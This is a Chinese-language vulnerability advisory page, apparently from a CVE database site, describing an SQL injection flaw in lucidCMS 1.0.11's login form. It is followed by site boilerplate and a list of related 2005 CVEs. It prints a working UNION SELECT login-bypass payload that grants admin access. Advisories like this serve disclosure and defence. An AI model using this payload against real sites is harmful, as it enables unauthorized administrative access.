lucidCMS是一款简单灵活的内容管理系统。 lucidCMS 1.0.11 允许攻击者通过登录框执行任意的SQL指令。 lucidCMS中存在多个输入验证错误: 1) 如果关闭魔术引号的话就会导致SQL注入: 在登录表单中输入以下内容,以管理员登录: 登录:'UNION(SELECT'1','admin','admin','FAKE@hotmail.com','d41d8cd98f00b204e9800998ecf8427e','1')/* 口令:无 ^
尽管我们使用了先进的大模型技术,但其输出仍可能包含不准确或过时的信息。神龙努力确保数据的准确性,但请您根据实际情况进行核实和判断。
| 厂商 | 产品 | 影响版本 | CPE | 订阅 |
|---|---|---|---|---|
| - | n/a | n/a | - |
|
| # | POC 描述 | 源链接 | 神龙链接 |
|---|
未找到公开 POC。
登录以生成 AI POC| CVE-2005-2804 | Novell GroupWise客户端本地整数溢出漏洞 | |
| CVE-2005-3127 | LucidCMS Index.PHP 跨站脚本攻击漏洞 | |
| CVE-2005-3128 | Squirrelmail Address Add Plugin 'add.php'跨站漏洞 | |
| CVE-2005-3129 | Serendipity 跨站请求伪造漏洞 | |
| CVE-2005-3131 | IceWarp 多个跨站脚本攻击漏洞 | |
| CVE-2005-3132 | MERAK Icewarp Web Mail 路径信息泄露漏洞 | |
| CVE-2005-3133 | IceWarp Web Mail 目录遍历漏洞 | |
| CVE-2005-3134 | Citrix MetaFrame Presentation Server安全策略绕过漏洞 | |
| CVE-2005-3135 | Virtools Web Player缓冲区溢出漏洞 | |
| CVE-2005-3136 | Virtools Web Player 目录遍历漏洞 |
暂无评论